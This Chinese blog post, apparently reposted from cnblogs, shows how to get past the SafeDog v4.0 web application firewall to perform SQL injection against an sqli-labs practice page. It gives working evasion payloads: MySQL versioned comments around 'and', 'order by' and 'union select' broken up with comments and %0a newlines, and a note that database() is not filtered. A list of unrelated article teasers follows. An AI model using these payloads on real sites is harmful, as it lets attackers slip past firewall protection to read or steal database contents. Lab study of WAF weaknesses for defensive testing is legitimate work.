首页 > 其他分享 >安全狗v4.0绕过

安全狗v4.0绕过

时间:2022-11-04 15:15:59浏览次数:36  
标签:语句 order v4.0 安全 0a --+ mysql 绕过 拦截

安全狗新升级 拦截界面都变了

and 1=1:

尝试输入payload

到and还没有拦截

但是输入 and 1=1之后就拦截了

我尝试了几次还认为是检测 and后面的数字 因为没有数字过后就不在拦截

所以尝试对数字替换 十六进制、负数、假的注释等等没用

后面查阅资料 发现安全狗一般检测关键字 会不会是 发现关键字 再检测后面的内容 所以这样才没有过滤and

对and进行更改

/*!14400and*/

在mysql中 /*! ....*/ 不是注释,mysql为了保持兼容,它把一些特有的仅在mysql上用的语句放在/*!....*/中,这样这些语句如果在其他数据库中是不会被执行,但在mysql中它会执行。如下语句/*!14400and*/;这里的14400表示假如 数据库是1.44.00及以上版本,该语句才会被执行。

 

order by:

payload:

http://www.sqlilabs.com/Less-2/?id=5%20/**/order/*/%0a*a*/by/**/3--+

分析:

并不单个拦截 而是两个单词在一起拦截

/**/order/*/%0a*a*/by/**/3--+

思路就是利用多个注释和换行来混淆

使用/**/ 和%oa(换行) 来放在判定为两个连接

 

 union select:

payload:

union /*//--/*/ /*!--+/*%0aselect/*!1,2,3*/ --+

分析:

和order by的拦截一样 均可使用换行%0a来进行绕过

中间加入多个格式的注释和空格来混淆

加入database()

让我很意外 居然没有拦截

正则表达式并没有单独匹配database()

 

标签:语句,order,v4.0,安全,0a,--+,mysql,绕过,拦截
From: https://www.cnblogs.com/me123/p/16844806.html

相关文章

  • 网络隔离的办公网和互联网,如何安全地进行跨网文件交换?
    根据国家《信息安全技术网络安全等级保护安全设计技术要求》文件,企业网络可以按照不同的等级保护级别进行安全域划分,目前在企业内部,网络隔离已成为非常普遍的现象,特别是对......
  • 广州华锐互动:虚拟现实技术打造安全事故模拟体验新模式
    随着我国的不断发展和文明程度的不断提高,安全问题越来越受到重视。对于安全事故的预防处理,作业人员每年都需要进行至少一次的安全教育培训和考核,但是很多事故无法亲身经历,......
  • 线程安全的单例模式
    懒汉式加方法锁publicclassSingleton{privatestaticSingletonsingleton=null;privateSingleton(){}publicstaticsynchronizedSingletongetIn......
  • 并发安全
    在并发的情况下使用和调度一个类,这个类总是能表现出正确的行为,那么我们就说这个类是并发安全的类。类线程安全的表现为:操作的原子性和内存的可见性。怎么才能做到类的线程......
  • 东进云服务器密码机荣获“2022中国网络安全行业最具竞争力产品”奖
    11月3日,由赛迪网、《数字经济》杂志联合主办的2022(第五届)行业信息化技术创新发展峰会在北京成功举办。大会现场重磅发布《2022行业信息化竞争力百强-2022行业信息化推优成......
  • Kotlin-null安全
    null安全是java空指针异常调优方案,kotlin将变量分为Nullable(可为空类型)和Non-Null(不可为空类型)。两种变量声明方式:Non-Nullvara:String="hello"不支持的写法var......
  • 安全选项卡消失
    本应该存在的“安全”选项卡消失“Win+R”输入Regedit删除Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSecurityT......
  • 手把手教你搭建消防安全答题小程序-首页
    火灾事故重预防,无灾避难得安康。本月是“119”消防月,请大家注意用火用气用电安全,共同做好单位、家庭消防安全工作。接下来,就让我手把手教你搭建消防安全答题小程序吧。软......
  • 请收下这 10 个安全相关的开源项目
    开源为我们的开发带来了极大便利,但这些便利也伴随着一些安全隐患。每当项目引入一个库、框架、服务时,随之而来的安全风险也不可忽视。所以,当开源吞噬世界的时候,代码安全......
  • 畜牧虚拟仿真3D交互展示应用为学生提供高逼真、安全的场景模拟实验环境-深圳华锐视点
    大力发展高等职业教育是我国实现经济快速可持续发展的必然选择,在强国发展占有举足轻重的作用。华锐视点立足于先进成熟的5G、VRAR、物联网、三维建模和AI等技术,以解决......